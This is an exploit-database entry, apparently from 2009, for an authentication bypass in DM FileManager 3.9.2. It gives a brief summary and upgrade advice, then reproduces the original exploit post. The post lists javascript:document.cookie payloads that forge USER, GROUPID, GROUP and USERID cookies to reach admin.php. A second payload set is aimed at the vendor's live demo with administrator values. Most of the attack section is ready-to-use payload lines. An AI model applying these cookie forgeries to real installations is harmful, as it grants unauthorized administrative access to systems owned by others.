DM FileManager 3.9.2 Insecure Cookie Handling Vuln

vendor:

DM FileManager

by:

ThE g0bL!N

7,5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: DM FileManager

Affected Version From: 3.9.2

Affected Version To: 3.9.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:dutchmonkey:dm_filemanager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DM FileManager 3.9.2 Insecure Cookie Handling Vuln

A vulnerability in DM FileManager 3.9.2 allows an attacker to gain administrative access by setting the USER, GROUPID, GROUP, and USERID cookies. The attacker can then access the admin.php page.

Mitigation:

Upgrade to the latest version of DM FileManager.

Source

Exploit-DB raw data:

DM FileManager 3.9.2 Insecure Cookie Handling Vuln
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://dutchmonkey.com
Special Thx: Snakespc
Note: Algerie 3-1 Egypt
Exploit:
------
javascript:document.cookie="USER=[user name ];path=/";
javascript:document.cookie="GROUPID=1;path=/";
javascript:document.cookie="GROUP=[Groupe of user];path=/";
javascript:document.cookie="USERID=[user_id];path=path=/";
Then Go to Url /admin.php
Demo:
----
http://dutchmonkey.com/products/dm-filemanager/demo/admin/login.php
Exp for demo:
------------
javascript:document.cookie="USER=GUEST;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="GROUPID=1;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="GROUP=ADMINISTRATORS;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="USERID=51;path=/products/dm-filemanager/demo/admin/";
Note: ALgerie en Coupe Du Monde In shaa ALLAH
################################################################################################

# milw0rm.com [2009-06-08]